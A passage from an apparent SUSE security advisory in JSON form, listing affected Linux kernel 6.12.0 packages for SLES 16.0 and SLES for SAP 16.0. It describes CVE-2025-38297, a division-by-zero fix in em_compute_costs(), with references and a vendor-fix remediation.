"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38262"
},
{
"cve": "CVE-2025-38297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM: EM: Fix potential division-by-zero error in em_compute_costs()\n\nWhen the device is of a non-CPU type, table[i].performance won\u0027t be\ninitialized in the previous em_init_performance(), resulting in division\nby zero when calculating costs in em_compute_costs().\n\nSince the \u0027cost\u0027 algorithm is only used for EAS energy efficiency\ncalculations and is currently not utilized by other device drivers, we\nshould add the _is_cpu_device(dev) check to prevent this division-by-zero\nissue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38297",
"url": "https://www.suse.com/security/cve/CVE-2025-38297"
},
{
"category": "external",
"summary": "SUSE Bug 1253078 for CVE-2025-38297",
"url": "https://bugzilla.suse.com/1253078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
